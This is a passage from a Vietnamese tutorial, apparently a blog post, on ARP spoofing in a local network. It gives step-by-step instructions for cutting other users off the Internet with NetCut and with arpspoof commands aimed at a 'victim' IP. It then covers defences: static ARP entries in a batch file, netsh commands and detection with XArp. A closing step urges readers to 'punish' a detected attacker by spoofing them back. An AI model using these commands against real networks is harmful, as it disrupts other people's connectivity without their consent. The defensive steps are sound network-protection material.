Sau khi cài đặt và chạy chương trình, cách sử dụng cũng rất đơn giản, bạn chỉ cần chọn 1 hoặc nhiều máy tính và ấn Cut Off, sau một vài giây các máy tính đó sẽ bị mất mạng không truy cập Internet được, khi muốn khôi phục mạng lại bạn chọn máy tính và ấn Resume.
Chú ý là nếu bạn tích chọn Protected My Computer thì máy tính của bạn sẽ không bị ảnh hưởng bởi cuộc tấn công này.
>>> Cách thứ 2 là sử dụng bộ công cụ WinPcap4 và ArpSpoof. Bạn hãy cài phần mềm WinPcap4, sau đó copy 2 file arpspoof.exe và Libnet.dll trong thư mục arpspoof vào ổ C:\ trên máy tính bạn để có thể sử dụng ArpSpoof.
Thực hiện như sau:
> Bạn mở CMD (Start/Run gõ cmd) rồi chuyển thư mục làm việc về ổ C:\ bằng cách gõ cd\
> Trước hết bạn cần biết được địa chỉ IP của Gateway, bạn hãy gõ vào ipconfig, Enter là bạn sẽ thấy IP của chính máy mình và của Gateway, thường sẽ là 192.168.1.1
> Tiếp theo là tấn công máy tính nạn nhân, bạn gõ tiếp lệnh arpspoof -t [ip Gateway] [ip máy nạn nhân]
ví dụ : arpspoof -t 192.168.1.1 192.168.1.12
rồi gõ tiếp 2 và Enter, vậy là cuộc tấn công sử dụng arpspoof bắt đầu rồi đó, bạn cứ để cửa sổ CMD để chương trình chạy như vậy, khi đó nạn nhân sẽ mất mạng Internet. Để tăng tính hiệu quả bạn có thể mở nhiều cửa sổ CMD và chạy lệnh như vậy.
Khi muốn ngừng cuộc tấn công, bạn có thể mở lại cửa sổ CMD đang chạy và ấn Ctrl + C hoặc đóng hẳn cửa sổ CMD đó đi.
Một vài phút sau khi ngừng tấn công, nạn nhân sẽ lại truy cập Internet được.

Chú ý : với cả 2 cách này, có thể sau khi đã ngừng tấn công một lúc sau nạn nhân vẫn chưa vào Internet được, khi đó nạn nhân cần vào My Network Places rồi Disable và lại Enable lại kết nối (thường là Local Area Connection) thì mới có thể truy cập Internet lại.

* Trên đây là cách tấn công, vậy chúng ta có thể làm gì để phòng chống cuộc tấn công này và biết được máy tính nào đã thực hiện cuộc tấn công.
Trước tiên hãy chú ý là để phòng chống cuộc tấn công này thì bạn phải bắt đầu thực hiện từ trước khi bị tấn công hoặc từ ngay khi mới mở máy tính lên (có thể là bằng cách tạo file chạy khi khởi động máy tính).


Bước 1:
Bạn vào CMD và gõ lệnh sau để lấy về toàn bộ địa chỉ IP và MAC của mạng LAN để lưu trữ lại
for /l %x in (1,1,12) do ping 192.168.1.%x -n 1
Tiếp theo là lệnh
arp -a

Bạn sẽ thấy hiển thị kết quả tương tự như sau:
> Interface: 192.168.1.3 --- 0x2
>  Internet Address      Physical Address      Type
>  192.168.1.1           00-27-19-f9-1c-e2     dynamic
>  192.168.1.4           00-24-1d-5f-cc-2c     dynamic
>  192.168.1.12          00-0b-6a-8c-2c-77     dynamic

Bạn hãy chú ý đến địa chỉ MAC (Physical Address) của Gateway, vì nó thường sẽ bị thay đổi khi bị tấn công, còn bình thường địa chỉ MAC của tất cả các máy đều cố định.

Bước 2:
Bạn copy phần thông tin phía dưới dòng Internet Address rồi mở Notepad, paste vào, rồi Save as thành 1 file .bat, ví dụ Test.bat, bạn chú ý chọn All Files ở chỗ Save as Type
Nội dung file bat có dạng sau :
arp -d *
arp -s 192.168.1.1 00-27-19-f9-1c-e2
arp -s 192.168.1.4 00-24-1d-5f-cc-2c
arp -s 192.168.1.12 00-0b-6a-8c-2c-77
ping google.com -n 2
pause

Có thể những bạn chưa biết sẽ thắc mắc là làm thế nào để copy trong CMD, bạn làm như sau:
Phải chuột ở giữa cửa sổ CMD chọn Mark, bạn bôi đen những dòng cần copy, rồi ấn Enter, vậy là copy được rồi đó.

Chú ý : bạn có thể tạo file bat như trên để lưu giữ chạy cho những lần sau, hoặc có thể ghi lại địa chỉ IP và MAC của Gateway ra ngoài để sử dụng sau khi bị tấn công

>>>>> Tất cả trên đây là công đoạn chuẩn bị trước phòng ngừa có thể bị tấn công.
Sau khi phát hiện thấy mình đang bị tấn công rồi, bạn làm như sau

Cách 1 : kích đúp chuột chạy luôn cái file .bat mà bạn đã tạo ra ở trên
Cách 2 : mở CMD và gõ lệnh
Với win XP
arp -s [ip Gateway] [MAC Gateway], vi du : arp -s 192.168.1.1 00-27-19-f9-1c-e2
Với Win 7 
netsh -c "interface ipv4" set neighbors "tên card mạng" "IP gateway" "MAC gateway"
vi du : 
netsh -c "interface ipv4" set neighbors "Local Area Connection" "192.168.1.1" "00-27-19-f9-1c-e2"

Vậy là xong, bạn lại có thể truy cập Internet như bình thường.
Nếu vẫn chưa được bạn hãy thử vào My Network Places rồi Disable và lại Enable lại kết nối (thường là Local Area Connection) nhé.

Bước 3:
Giờ tôi sẽ nói cho các bạn biết làm thế nào để chúng ta biết đang bị tấn công ARP spoofing khi bị mất mạng và cách phát hiện ra máy tính thực hiện cuộc tấn công đó nhé.
Cách 1: Sử dụng phần mềm XArp 2.0.
Bạn chạy chương trình XArp 2.0 và sẽ nhìn thấy một số dòng màu đỏ, trong đó có IP Gateway, máy tấn công và các máy nạn nhân.
Bạn hãy loại ra IP Gateway và các IP máy nạn nhân bị mất mạng, còn lại chính là IP của máy tính tấn công đó (máy này không bị mất mạng).
Nếu chú ý hơn vào XArp 2.0, bạn kéo ra sau cùng sẽ thấy cột How Often seen, bạn sẽ thấy số dữ liệu trao đổi giữa Gateway và các máy nạn nhân tăng lên tương ứng nhau, còn máy tấn công thì khác hẳn.
Cách 2: bạn ping đến từng máy trong mạng LAN xem máy nào kết nối chập chờn, lúc được lúc không thì đó chính là máy tấn công ARP spoofing bằng NetCut hay ArpSpoof. Tất nhiên cách này thủ công và mất nhiều thời gian hơn.
Ví dụ bạn phát hiện ra máy tấn công là 192.168.1.12

Bước 4: Hãy trừng phạt kẻ tấn công này
Sau khi đã lấy lại được kết nối Internet, bạn hãy sử dụng lại chính arpspoof để trừng phạt kẻ tấn công này, cách làm tương tự như cách tấn công thứ 2 đã nói ở trên. Bạn vào CMD và gõ lệnh
arpspoof -t 192.168.1.1 192.168.1.12 
rồi chọn 2, Enter
với 192.168.1.1 là IP Gateway và 192.168.1.12 là IP máy tấn công vừa phát hiện ra ở trên.
* Ngoài cách phòng chống bị tấn công ở trên, còn một cách nữa là bạn sử dụng chính phần mềm NetCut và tích chọn Protected My Computer hoặc dùng phần mềm Anti Netcut v2
DOWNLOAD tất cả công cụ và phần mềm nói trên ở đây
Link Download tốc độ cao tại Google Docs và MegaShare.vn